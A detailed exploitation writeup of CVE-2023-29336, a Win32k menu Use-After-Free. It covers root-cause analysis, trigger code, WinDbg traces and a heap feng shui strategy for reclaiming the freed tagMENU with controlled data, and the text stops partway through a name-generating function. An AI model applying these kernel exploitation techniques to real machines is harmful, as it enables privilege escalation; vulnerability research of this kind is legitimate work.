Win32k that we lost: a detailed writeup of CVE-2023-29336
Introduction
This article was originally written almost two years ago, and I have finally found time to translate and publish it properly. Enjoy this story of exploiting Win32k at a time when it still didn’t have a garbage collector. Who knows, maybe by the time you’re reading this, Win32k has finally been rewritten in Rust. This exploit wouldn’t have been possible without the article by NumenCyber, which provided key insights into the menu layout needed to build a reliable trigger. All experiments were run on a fairly old Windows 10 1607, build 10.0.14393.5850 amd64.
Patchdiff
I took the files for patch diffing from WinBinIndex. The following table shows what we are actually going to compare.
Filename | Hash | Version |
---|---|---|
win32kfull.sys | 827B4223666871A7FE7274F97EECB74AFB380E41 | Win10-1607-x8664 (April 2023) |
win32kbase.sys | 8FFEF7F7E2BFB01619E58CD52486283316AA3E7A | Win10-1607-x8664 (April 2023) |
win32k.sys | 23F88CD6E2541CB54D77809B840F41532E3277B3 | Win10-1607-x8664 (April 2023) |
win32kfull.sys | DF3D021A84B13A74182C993E982E27B16C38F9C1 | Win10-1607-x8664 (May 2023) |
The comparison result produced by BinDiff for win32kfull is quite clear: only one function was changed.
Root Cause Analysis
The vulnerable function is xxxEnableMenuItem. Inside that function, a callback is issued without taking a reference to the tagMENU object returned by the MenuItemState function. That allows an attacker to reach a Use-After-Free condition.
But before we dive into the deep technical stuff, let’s discuss the callback problem in general. Callback functions are a common programming pattern that allows extensibility by letting user-defined functions execute at specific extension points in a general algorithm (or main logic). In other words, the user injects their own functions into those extension points to implement something useful. However, this pattern introduces challenges, especially around trust and ownership of shared resources, both before the callback is invoked and after control returns to the main execution flow. These challenges become even more complex when callbacks cross trust boundaries, such as transitions between kernel and user mode, or across a network.
There are several ways to mitigate these risks: creating a separate copy of the state to pass into the callback (and avoiding reuse in the main logic), using reference counting, resource locking, and more. Each method has its trade-offs in terms of complexity, performance, and safety.
In this case, the tagMENU type supports reference counting. Reference counting is a mechanism that prevents an object instance from being released while it is still in use, that is, as long as some code holds a reference to it. The idea is simple: whenever code begins working with a protected object, it must increment the reference counter; when it is done, it decrements it. The crucial point is that the reference count must stay consistent throughout the object’s entire lifecycle. If the counter gets out of sync, reference counting provides no protection at all.
The main drawback is obvious: if a programmer forgets to increment the reference counter before using the object, then — from the system’s perspective — that code never actually used the object.
When callbacks are involved, this opens up a dangerous scenario. For example, the callback can release the object, then fill the freed memory with a completely unrelated object — all before the original function resumes execution. When the flow returns to the main logic and touches the original pointer again… 💥
That’s a textbook Use-After-Free.
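The scenario can be reduced to a few lines of portable C. This is only a sketch: the Obj type and all function names are hypothetical, and the "free" is modeled by a flag so the example stays safe to run. It contrasts the buggy pattern (no reference taken before the callback) with the fixed one.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for a reference-counted kernel object. */
typedef struct Obj {
    int  lock_count; /* reference counter */
    bool freed;      /* set instead of calling free(), so the demo stays safe */
} Obj;

static void obj_lock(Obj *o) { o->lock_count++; }

/* Drop one reference; the object is released when the count hits zero. */
static void obj_unlock(Obj *o)
{
    if (--o->lock_count == 0)
        o->freed = true;
}

/* The "user-mode callback": it drops the only reference it knows about. */
static void destroy_callback(Obj *o) { obj_unlock(o); }

/* Buggy pattern: the object is used after a callback without being locked. */
static bool use_after_callback_unlocked(Obj *o)
{
    destroy_callback(o);
    return o->freed; /* true means the caller now holds a dangling pointer */
}

/* Fixed pattern: take a reference before the callback, drop it afterwards. */
static bool use_after_callback_locked(Obj *o)
{
    obj_lock(o);
    destroy_callback(o);
    bool dangling = o->freed; /* still alive here: our reference pins it */
    obj_unlock(o);
    return dangling;
}
```

In the unlocked variant the callback drives the counter to zero while the caller still holds the pointer; in the locked variant the release is deferred until the caller is done.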
Now you might ask: where is the callback in xxxEnableMenuItem? Right before the spot where the reference counter increment was added. See it now? If not, no worries: I have prepared a quick clarification.
Internally, Microsoft uses specific naming prefixes for their functions, and these often carry special meaning. Most of the time, the prefix reflects the subsystem the function belongs to. But there are other conventions too. One particularly important prefix is xxx, which typically indicates that somewhere inside that function, there is a callback into user mode.
So yes, there is a callback happening inside xxxEnableMenuItem, and the absence of a proper reference count increment before it is the core of this bug.
That wraps up the root cause of the vulnerability. Now, let’s move on to the exploitation process.
Trigger
First, let’s figure out what the tagMENU structure is and what the MenuItemState function does. After that, we’ll find out how to reach user mode and set everything up to trigger the vulnerability.
What is tagMENU?
tagMENU is an internal structure used by Windows to implement the menu UI. Unfortunately, its memory layout is not officially documented. However, we can find clues in resources like ReactOS and the leaked source code of Windows XP.
After reverse-engineering the actual layout of tagMENU on Windows 10.0.14393.5850 amd64, here’s what it looks like:
struct MyTagMenu_Win10x64_98h
{
    MyHead_win10x64 head;               // 00000000
    MyProcDeskHead deskhead;            // 0000000C
    __int32 fFlags;                     // 00000028
    __int8 gap1[4];                     // 0000002C
    __int32 cAllocated;                 // 00000030
    __int32 cItems;                     // 00000034
    __int32 cxMenu;                     // 00000038
    __int32 cyMenu;                     // 0000003C
    __int8 gap2[8];                     // 00000040
    MyTagWnd_win10x64_168h *wnd;        // 00000048
    MyTagItem_Win10x64_98h *rgItems;    // 00000050
    __int64 pParentMenusList;           // 00000058
    __int32 dwContextHelpID;            // 00000060
    __int32 field_64;                   // 00000064
    __int64 dwMenuData;                 // 00000068
    __int8 gap3[20];                    // 00000070
    __int64 field_84;                   // 00000084
    __int64 field_8C;                   // 0000008C
    __int32 field_94;                   // 00000094
};
What does MenuItemState do?
The MenuItemState function is responsible for locating a specific menu item, typically by its uID. Internally, it uses a recursive helper function called MNLookupItem, which performs the actual lookup.
Here’s a snippet of the MNLookupItem implementation:
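To make the lookup logic concrete, here is a rough model of a recursive item search. It is not the Win32k implementation: the Item and Menu types and the lookup_item name are hypothetical, and the real function handles more cases. What it does show is the out-parameter that hands back the menu directly containing the match.

```c
#include <stddef.h>

typedef struct Menu Menu;

/* Hypothetical, simplified item: an ID plus an optional submenu. */
typedef struct Item {
    unsigned id;
    Menu    *submenu;
} Item;

struct Menu {
    size_t count;
    Item  *items;
};

/*
 * Depth-first search for an item ID. On success returns the item and stores
 * the menu that directly contains it in *owner.
 */
static Item *lookup_item(Menu *menu, unsigned id, Menu **owner)
{
    for (size_t i = 0; i < menu->count; i++) {
        Item *it = &menu->items[i];
        if (it->submenu != NULL) {
            Item *hit = lookup_item(it->submenu, id, owner);
            if (hit != NULL)
                return hit;
        } else if (it->id == id) {
            *owner = menu;
            return it;
        }
    }
    return NULL;
}
```

The caller ends up with a raw pointer to a submenu it never took a reference on, which is exactly the kind of pointer that must be pinned before any callback runs.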
Reaching the UserMode
The callback to user mode lives in xxxRedrawTitle, which is called from xxxEnableMenuItem. But to reach that point, several checks in xxxEnableMenuItem must first be satisfied.
The first check is that the menu (passed as the first argument to MenuItemState) must be a system menu. A system menu is retrieved via the GetSystemMenu API.
The second check is whether the menu item identifier, which is returned in the v15 variable, matches one of the system-reserved IDs. These identifiers are typically occupied by default entries in the system menu (like “Restore”, “Move”, “Size”, etc.).
Here’s the trick: there’s no restriction on deleting default menu items. That means we can remove a default menu item and insert our own custom-controlled menu item, placing it wherever we want in the menu tree.
Now, gathering all prerequisites, we should create the following menu layout:
Why is MenuA the UAF target?
You might be asking: Why is MenuA chosen as the Use-After-Free target?
Let’s look back at the patched code and the implementation of MNLookupItem. The v15 variable holds a pointer to the submenu that contains the menu item with a reserved system ID. That’s why MenuA is the one: it’s the submenu directly referenced by v15.
And here’s the key issue:
MenuA doesn’t have its reference count incremented before the callback is invoked.
Usermode Callback in xxxRedrawTitle
Now let’s look at xxxRedrawTitle. There are three different code paths in this function that allow execution to cross into user mode:
- Going down the rabbit hole through xxxDrawCaptionBar
- xxxCallHook, which invokes user-mode hooks. These hooks are set through the SetWindowsHookExA API
- xxxSendMessage, which is the simplest and most direct path, and the one I used
To receive the WM_NCUAHDRAWCAPTION message, we need to create a custom WndProc for the window that owns the menu targeted for UAF. That message will be dispatched to the window procedure during the redraw, allowing us to execute code in the callback and destroy the menu at exactly the right moment.
The code that releases the menu can be seen in the snippet below:
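// WM_NCUAHDRAWCAPTION is undocumented and missing from the SDK headers.
#ifndef WM_NCUAHDRAWCAPTION
#define WM_NCUAHDRAWCAPTION 0x00AE
#endif

LRESULT CALLBACK wndproc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
    switch (msg) {
    case WM_NCUAHDRAWCAPTION: {
        // WPARAM/LPARAM are 64-bit on amd64, so cast them for printing.
        wprintf(L"[?] wndproc: msg=WM_NCUAHDRAWCAPTION wParam=%llx lParam=%llx\n",
                (unsigned long long)wParam, (unsigned long long)lParam);
        // Detach every item from the top-level menu, last to first.
        for (int i = GetMenuItemCount(g_hMenu_Top) - 1; i >= 0; i--) {
            RemoveMenu(g_hMenu_Top, i, MF_BYPOSITION);
        }
        wprintf(L"[+] 5. Destroy Menu\n");
        system("pause");
        DestroyMenu(g_hPopupMenu_A); // Here MenuA will be freed
        ...
        break;
    }
    }
    return DefWindowProc(hWnd, msg, wParam, lParam);
}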
Debugging
Our debugging target is my PoC of the exploit, available on GitHub.
Let’s start by finding the address of the PoC process and switching context into it:
kd> !process 0 0 poc.exe
PROCESS ffffcc0e6b8f6800 <--> EPROCESS
SessionId: 1 Cid: 0c30 Peb: 5858bd5000 ParentCid: 014c
DirBase: 2cf00000 ObjectTable: ffff94044295ad80 HandleCount: <Data Not Accessible>
Image: poc.exe
kd> .process /i /r ffffcc0e6b8f6800
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g
Because Win32k is not mapped into the System process, we need to run the commands above to switch into the correct session context. Win32k is only mapped into processes that deal with the GUI. More details about what’s mapped inside the System process can be found in this classic Microsoft article.
Once context is switched, it’s a good idea to reload symbols:
kd> .reload
Set a breakpoint on win32kfull!xxxEnableMenuItem and continue execution:
kd> bp /p ffffc70664bac680 win32kfull!xxxEnableMenuItem
kd> g
Once the breakpoint hits, step through until you reach the call to the win32kfull!MenuItemState function. Its last argument is an out parameter that will receive a pointer to the MenuA instance, the target of our UAF.
kd> p
rax=ffffa0817b949ab0 rbx=fffffa8ac064c6b0 rcx=fffffa8ac064c6b0
rdx=000000000000f010 rsi=0000000000000002 rdi=000000000000f010
rip=fffffac7010196ae rsp=ffffa0817b949a50 rbp=ffffa0817b949b80
r8=0000000000000002 r9=0000000000000003 r10=fffffa8ac1b5b870
r11=ffffa0817b949aa8 r12=00000000000204b6 r13=00000000000104ab
r14=0000000000000020 r15=fffffa8ac0629770
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
win32kfull!xxxEnableMenuItem+0x2a:
fffffac7`010196ae e801010000 call win32kfull!MenuItemState (fffffac7`010197b4)
kd> ? poi(r11-0x38)
Evaluate expression: -104996992148816 = ffffa081`7b949ab0
kd> dq ffffde00877b0ab0 L1
ffffde00`877b0ab0 00000000`000104af <---> Uninitialized value
kd> p
rax=0000000000000000 rbx=ffffd7d74062a5f0 rcx=0000000000000002
rdx=000000000000f010 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac796b3 rsp=ffffde00877b0a50 rbp=ffffde00877b0b80
r8=0000000000000000 r9=ffffde00877b0ab0 r10=ffffd7d74062e890
r11=0000000000000003 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
win32kfull!xxxEnableMenuItem+0x2f:
ffffd7aa`3ac796b3 f7432800010000 test dword ptr [rbx+28h],100h ds:002b:ffffd7d7`4062a618=04000101
kd> dq ffffde00877b0ab0 L1
ffffde00`877b0ab0 ffffd7d7`4062cfe0
kd> db ffffd7d7`4062cfe0
\/
ffffd7d7`4062cfe0 73 00 03 00 00 00 00 00-01 00 00 00 00 00 00 00 s...............
ffffd7d7`4062cff0 00 00 00 00 00 00 00 00-70 1d 45 64 06 c7 ff ff ........p.Ed....
ffffd7d7`4062d000 e0 cf 62 40 d7 d7 ff ff-01 00 00 00 00 00 00 00 ..b@............
ffffd7d7`4062d010 08 00 00 00 02 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d030 00 e8 62 40 d7 d7 ff ff-50 2d 60 40 d7 d7 ff ff ..b@....P-`@....
ffffd7d7`4062d040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
In the memory dump above, we can see the reference counter associated with the MenuA object. It’s stored at offset +0x08 from the beginning of the object. The value is currently 1, and we know this value won’t be incremented — meaning the object is vulnerable to being freed while still in use.
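As a small worked example, the first bytes of the dump can be decoded in C. The HeadView layout below is an assumption inferred only from this dump and the +0x08 offset mentioned above (an 8-byte value followed by a 32-bit counter); the names are hypothetical, and the code assumes a little-endian host.

```c
#include <stdint.h>
#include <string.h>

/* Assumed layout of the first 12 bytes, inferred from the dump only. */
typedef struct HeadView {
    uint64_t handle;     /* +0x00, presumably the object handle */
    uint32_t lock_count; /* +0x08, the reference counter */
} HeadView;

/* Decode the header fields from raw dump bytes (little-endian host). */
static HeadView read_head(const uint8_t *bytes)
{
    HeadView h;
    memcpy(&h.handle, bytes, sizeof h.handle);
    memcpy(&h.lock_count, bytes + 8, sizeof h.lock_count);
    return h;
}
```

Feeding it the first row of the dump (73 00 03 00 00 00 00 00 01 00 00 00 ...) yields 0x30073 for the first field and 1 for the counter.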
Continue stepping until we reach the call to the win32kfull!xxxRedrawTitle function. The PoC has already set up all the required conditions; nothing too tricky, just basic Windows API usage.
kd> p
rax=ffffa0817b949a80 rbx=fffffa8ac064c6b0 rcx=fffffa8ac064c4a0
rdx=0000000000001000 rsi=0000000000000002 rdi=000000000000f010
rip=fffffac701019758 rsp=ffffa0817b949a50 rbp=0000000000000000
r8=0000000000000000 r9=ffffa0817b949ab0 r10=fffffa8ac06299a0
r11=0000000000000003 r12=00000000000204b6 r13=00000000000104ab
r14=0000000000000020 r15=fffffa8ac0629770
iopl=0 nv up ei pl nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000206
win32kfull!xxxEnableMenuItem+0xd4:
fffffac7`01019758 e853e30000 call win32kfull!xxxRedrawTitle (fffffac7`01027ab0)
Set a hardware breakpoint right after the call, and another one at win32kfull!DestroyMenu, where MenuA will be freed:
kd> ba e 1 ffffd7aa`3ac7975d
kd> bp /p ffffc70664bac680 win32kfull!DestroyMenu
kd> g
Once the callback runs and attempts to release the menu, the win32kfull!DestroyMenu breakpoint will trigger.
kd> g
Breakpoint 2 hit
rax=0000000000000001 rbx=0000000000000000 rcx=ffffd7d74062cfe0
rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000020
rip=ffffd7aa3ac96d20 rsp=ffffde008616de08 rbp=ffffde008616dec0
r8=0000000000000002 r9=0000000000000040 r10=ffffd7d743d997c0
r11=ffffd7d743d997c0 r12=00000000000204d0 r13=00000000000000ae
r14=00000000000204d0 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000246
win32kfull!DestroyMenu:
ffffd7aa`3ac96d20 48895c2410 mov qword ptr [rsp+10h],rbx ss:0018:ffffde00`8616de18=0000000000000000
Step through until you reach win32kbase!HMFreeObject, where RCX still points to MenuA.
rax=0000000000000000 rbx=ffffd7d74062cfe0 rcx=ffffd7d74062cfe0 <------- MenuA
rdx=0000000000000000 rsi=ffffd7d74062e920 rdi=0000000000000000
rip=ffffd7aa3aa3ee20 rsp=ffffde008616ddd8 rbp=ffffde008616dec0
r8=0000000000000080 r9=0000000000000001 r10=0000000000000003
r11=0000000000000001 r12=00000000000204d0 r13=00000000000000ae
r14=00000000000204d0 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
win32kbase!HMFreeObject:
ffffd7aa`3aa3ee20 48895c2410 mov qword ptr [rsp+10h],rbx ss:0018:ffffde00`8616dde8=ffffd7d74062e920
A bit further in, you’ll hit nt!RtlFreeHeap, which actually frees the memory. R8 holds the base address of the freed memory block:
rax=ffffd7d743d99701 rbx=ffffd7d740400ac8 rcx=ffffd7d740600000
rdx=0000000000000000 rsi=0000000000000000 rdi=ffffd7d74062cfe0
rip=ffffd7aa3aa3ef82 rsp=ffffde008616dda0 rbp=ffffde008616de12
r8=ffffd7d74062cfe0 r9=0000000000000001 r10=0000000000000003
r11=0000000000000001 r12=00000000000204d0 r13=00000000000000ae
r14=0000000000000001 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000246
win32kbase!HMFreeObject+0x162:
ffffd7aa`3aa3ef82 ff1500820f00 call qword ptr [win32kbase!_imp_RtlFreeHeap (ffffd7aa`3ab37188)] ds:002b:ffffd7aa`3ab37188={nt!RtlFreeHeap (fffff803`4683bfd4)}
Now continue execution until the post-callback hardware breakpoint hits. We’re back inside win32kfull!xxxEnableMenuItem, but MenuA is already freed.
kd> g
Breakpoint 1 hit
rax=0000000000000001 rbx=ffffd7d74062a5f0 rcx=ffffd7d74062a3e0
rdx=ffffd7d740600820 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac7975d rsp=ffffde00877b0a50 rbp=0000000000000000
r8=ffffd7d740600700 r9=ffffc70664451d70 r10=000000032ca29f71
r11=ffffde00877b0640 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
win32kfull!xxxEnableMenuItem+0xd9:
ffffd7aa`3ac7975d 81ff60f00000 cmp edi,0F060h
After the previously set breakpoint is hit, let’s continue stepping through the code until we reach the call to the win32kfull!MNGetPopupFromMenu function.
kd> p
rax=ffffd7d74062a3e0 rbx=ffffd7d74062a5f0 rcx=ffffd7d74062cfe0
rdx=0000000000000000 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac796ca rsp=ffffde00877b0a50 rbp=0000000000000000
r8=ffffd7d740600700 r9=ffffc70664451d70 r10=000000032ca29f71
r11=ffffde00877b0640 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000246
win32kfull!xxxEnableMenuItem+0x46:
ffffd7aa`3ac796ca e835e20100 call win32kfull!MNGetPopupFromMenu (ffffd7aa`3ac97904)
The RCX register contains the same pointer we observed earlier, right after the call to win32kfull!MenuItemState. Let’s dump the contents of that object again. This time, we’ll see that the memory has changed.
kd> db ffffd7d74062cfe0
ffffd7d7`4062cfe0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
ffffd7d7`4062cff0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
ffffd7d7`4062d000 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
ffffd7d7`4062d010 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
ffffd7d7`4062d020 41 41 41 41 41 41 40 30-30 30 30 00 00 00 00 00 AAAAAA@0000.....
ffffd7d7`4062d030 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
ffffd7d7`4062d050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
So how did that happen? Our callback didn’t just release the memory — it reclaimed it with controlled data.
Let’s dive into the next question: How do we replace a freed kernel object in memory with controlled data?
Exploit
Heap feng shui
Before diving into the heap feng shui used in this exploit, let’s first revisit some core concepts at a high level.
In Win32k, most GUI-related objects are associated with a specific Desktop. These objects are allocated from a Desktop Heap, which is created during desktop initialization. This heap is managed by the nt heap implementation (RtlpAllocateHeap/RtlpFreeHeap). We can roughly imagine the desktop heap as a list of free memory chunks sorted in ascending order. Each chunk is a fixed-size virtual memory block. When an allocation is made, a chunk is taken from the list; when it’s freed, the chunk is returned to the list.
Key details of the allocator:
RtlpAllocateHeap
- Aligns the requested size to a 16-byte boundary
- Searches for the first chunk in the free list that is large enough
- If the found chunk is larger than needed, it’s split into two: the left part is returned to the caller, and the right part is reinserted into the free list
RtlpFreeHeap
- Marks the chunk as freed
- If adjacent chunks (left/right) are also free, they may be coalesced into a single larger chunk
From this behavior, a simple conclusion emerges: Subsequent allocations and deallocations of the same size will almost always reuse the same memory chunk.
This reuse behavior is critical to reliably reclaiming freed objects — and forms the basis of our exploitation strategy.
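The reuse claim can be checked against a toy allocator. The sketch below is not the Rtlp* code: it only models the behavior listed above (16-byte alignment, a size-sorted free list, first fit, splitting) and deliberately leaves out coalescing. All names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_FREE 16

/* Toy free list: NOT the real Rtlp* code, just the behavior described above. */
typedef struct Chunk { uintptr_t addr; size_t size; } Chunk;
typedef struct Heap  { Chunk free_list[MAX_FREE]; size_t n; } Heap;

static size_t align16(size_t x) { return (x + 15) & ~(size_t)15; }

/* Return a chunk to the list, keeping it sorted by size (ascending). */
static void heap_free(Heap *h, uintptr_t addr, size_t size)
{
    size = align16(size);
    if (h->n == MAX_FREE)
        return; /* toy model: drop the chunk when the list is full */
    size_t i = h->n++;
    while (i > 0 && h->free_list[i - 1].size > size) {
        h->free_list[i] = h->free_list[i - 1];
        i--;
    }
    h->free_list[i] = (Chunk){ addr, size };
}

/* Take the first chunk that is large enough; split off the right remainder. */
static uintptr_t heap_alloc(Heap *h, size_t size)
{
    size = align16(size);
    for (size_t i = 0; i < h->n; i++) {
        if (h->free_list[i].size < size)
            continue;
        Chunk c = h->free_list[i];
        for (size_t j = i + 1; j < h->n; j++)
            h->free_list[j - 1] = h->free_list[j];
        h->n--;
        if (c.size > size)
            heap_free(h, c.addr + size, c.size - size);
        return c.addr;
    }
    return 0; /* out of memory in this toy model */
}
```

Freeing a 0x98-byte object and immediately requesting 0x98 bytes again returns the same address in this model, because the freed 0xA0 chunk is the smallest one that fits.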
Obviously, this is an oversimplification. There are many allocator behaviors that may matter in other cases, like LFH (Low Fragmentation Heap), chunk header encoding, randomized selection, etc. But for clarity, I’ve intentionally kept this section as simple as possible.
Before we can act, we need a plan:
- Prepare the Desktop Heap, specifically the list of free chunks. We want this list to start with chunks located at controlled or predictable addresses, and with sizes as close as possible to the size of the target object. We’ll refer to these candidate chunks as “seats”.
- Allocate the target object in one of those prepared seats. Roughly speaking, we want to “seat” the object into the right place.
- Free the target object, creating a hole at a known location.
- Reallocate all “seats” with controlled objects to replace the freed object.
Now we have a plan and we are ready to discuss each step in detail.
Heap preparation usually consists of two steps: Heap Normalization and Freeing Selected Chunks.
- Allocate a large number of memory chunks to normalize the heap layout. The goal is to make subsequent allocations more predictable — or even strictly sequential.
- Allocate another batch of chunks and selectively free some of them using appropriate APIs. Most of the time, we want to avoid freeing adjacent chunks to prevent coalescing. We’re aiming to create isolated free chunks — “the seats” — that will later be used to reclaim the target object.
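Why adjacent frees are avoided can be shown with a tiny model of a row of equally sized chunks. This is a sketch under the assumption that the chunks really are laid out sequentially after normalization; the function names are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

/* Mark every second chunk as free, so no two free chunks are neighbors. */
static void free_every_other(bool *is_free, size_t n)
{
    for (size_t i = 0; i < n; i++)
        is_free[i] = (i % 2 == 1);
}

/*
 * Count free runs that consist of exactly one chunk. A longer run would be
 * coalesced by the allocator into a bigger block and stop being a "seat".
 */
static size_t count_seats(const bool *is_free, size_t n)
{
    size_t seats = 0;
    for (size_t i = 0; i < n; ) {
        if (!is_free[i]) {
            i++;
            continue;
        }
        size_t run = 0;
        while (i < n && is_free[i]) {
            run++;
            i++;
        }
        if (run == 1)
            seats++;
    }
    return seats;
}
```

With eight chunks, freeing every other one gives four seats. Freeing one extra chunk between two seats merges three chunks into a single larger block and leaves only two usable seats.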
Before we can prepare any seats, we obviously need to allocate something first. But to do that, we need to answer an important question: What size should our seats be?
The heap allocator (RtlpAllocateHeap) selects the smallest free chunk that fits the aligned allocation size, so the closer our seat size is to the size of the target object, the higher the chance that chunk will be reused during reallocation. The ideal case, of course, is when the seat size is exactly equal to the aligned size of the target object.
This is a good spot to compute the actual size of the tagMENU chunk. The size of the struct is 0x98, but RtlpAllocateHeap will align it to 0xA0.
Just as a refresher, here’s the typical alignment formula, where x is the size and n is a power-of-two alignment: (size_t)((~(n - 1)) & ((x) + (n - 1)))
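The same formula as a compilable macro, applied to the tagMENU size. The macro and function names are only illustrative.

```c
#include <stddef.h>

/* Round x up to a multiple of n; n must be a power of two. */
#define ALIGN_UP(x, n) \
    ((size_t)((~((size_t)(n) - 1)) & ((size_t)(x) + ((size_t)(n) - 1))))

/* Chunk size requested for a 0x98-byte tagMENU with 16-byte alignment. */
static size_t menu_chunk_size(void)
{
    return ALIGN_UP(0x98, 16);
}
```

For x = 0x98 and n = 16 this is (0x98 + 0xF) & ~0xF = 0xA7 & ~0xF = 0xA0.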
Since there’s no direct way to allocate arbitrary chunks in the Desktop Heap, we need to use APIs that internally allocate Win32k objects on that heap. Our goal is to either use an object whose size we can control, or choose an object whose size closely matches the size of the target (tagMENU). Fortunately, Win32k (along with the user-mode Win32 APIs) offers plenty of options. Many exposed APIs lead to object creation in the Desktop Heap:
- CreateWindow → allocates a tagWND
- CreateMenu → allocates a tagMENU
- CreateAcceleratorTable → allocates a tagACCELTABLE
- …
To make holes for the target tagMENU object, we’ll use an object allocated by the RegisterClassExW API, which creates a tagCLS structure.
This object is especially useful because we can control its size. By carefully adjusting fields in the WNDCLASSEXW structure, particularly cbClsExtra, we can fine-tune the layout of the resulting tagCLS object, making it a perfect fit for the freed chunk of tagMENU.
On the tested version of Windows (10.0.14393.5850), the size of a tagCLS object with cbClsExtra == 0 is A0h, which almost perfectly matches the size of the tagMENU structure.
However, there’s an important detail about how tagCLS objects are created:
Every tagCLS must have a name, specified in the lpszClassName field of the WNDCLASSEXW structure, and that name must be unique.
This name string is also allocated in the same Desktop Heap. As a result, the tagCLS and its name may be allocated in adjacent chunks. When the tagCLS is freed, its associated name is also freed, and the allocator coalesces the two chunks into one larger free block.
This can be a problem: the resulting free chunk might no longer be A0h or B0h, but something larger like D0h or more.
That breaks our assumption that the seat will perfectly match the target object’s size — and even small gaps can ruin the exploit.
💥 In practice, this behavior occasionally caused crashes during exploitation.
Fortunately, spraying a large number of allocations helps mitigate the issue by saturating the heap and improving the odds of perfect fits. But it doesn’t eliminate the problem completely.
The picture below shows the same situation from the free list’s point of view.
Now is a good time to highlight the code that actually allocates objects and creates the holes.
This part of the exploit relies on the assumption that the Desktop Heap has already been normalized, meaning that new allocations will be placed into adjacent chunks within the Desktop Heap. That gives us the predictability we need to ensure our freed object — the hole — is exactly where we want it.
Let’s move on to the next major step: how to fill the freed hole with a new tagMENU object. Strictly speaking, this part isn’t very difficult. Once again, we’ll rely on Win32k APIs. In this case, we’ll use the CreatePopupMenu function.
But as with the tagCLS case, there’s a subtle detail worth pointing out.
A tagMENU object may contain menu items, and memory for those items must be allocated. As you might guess, this memory is allocated on the same Desktop Heap as the tagMENU itself.
In the picture below, you can see how item allocation happens internally:
In the picture below, you can see the memory layout after CreatePopupMenu, specifically where the menu items are allocated:
Because the holes we created earlier were isolated from surrounding chunks, the tagMENU object itself will be allocated directly into one of those holes. However, the memory for the menu items (rgItems) will be allocated elsewhere, likely in a different free chunk on the Desktop Heap.
This separation is important. It means the menu object lands where we want (replacing the freed target), while its internal data structures won’t intersect with neighboring memory — preserving the integrity of the surrounding heap and improving exploit reliability.
After the trigger (which we’ve already discussed), the vulnerable tagMENU object gets freed. Now it’s time to reclaim that freed memory with something else, something fully under our control.
But what kind of object should we use to replace tagMENU?
We’ll go back to using a familiar structure: tagCLS.
However, this time we won’t use the tagCLS structure itself. Instead, we’ll target the class name field, lpszAnsiClassName.
As mentioned earlier, this string is allocated on the same Desktop Heap, and unlike the structure itself, we can control every byte at any offset. That makes it a perfect candidate for crafting a fake object layout.
Let’s summarize everything about the replacement strategy.
To reclaim the freed tagMENU chunk, we need to create a string of exactly 98h bytes, matching the size of the tagMENU.
This string must also be unique to satisfy the Win32k requirement that each tagCLS name be unique.
We then use that string as the lpszAnsiClassName field when registering a new tagCLS via RegisterClassExW.
There’s one more subtlety here:
Because the tagCLS structure itself is very similar in size to tagMENU, we need to ensure that it doesn’t accidentally land in the freed chunk. So, to avoid conflicts and ensure the name string lands there instead, we increase the size of the tagCLS using the cbClsExtra field of the WNDCLASSEX structure.
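Generating many unique names of a fixed size is the mechanical part of this step. The sketch below is an assumption about how that could be done, not the PoC’s code: it fills a 98h-byte buffer with filler bytes and a per-name "@NNNN" suffix, loosely mirroring the "AAAA...@0000" pattern visible in the earlier dump. Whether the terminator counts toward the 98h bytes is also an assumption, and in a real payload the filler region would carry the fake object fields instead of 'A's.

```c
#include <stdio.h>
#include <string.h>

#define PAYLOAD_SIZE 0x98 /* size of tagMENU on the tested build */

/*
 * Fill out[PAYLOAD_SIZE] with filler bytes and end it with "@NNNN" plus the
 * terminator, so that every generated name is different.
 */
static void make_unique_name(char out[PAYLOAD_SIZE], unsigned index)
{
    char suffix[8];
    snprintf(suffix, sizeof suffix, "@%04u", index % 10000u);
    size_t tail = strlen(suffix); /* always 5 characters */
    memset(out, 'A', PAYLOAD_SIZE - 1 - tail);
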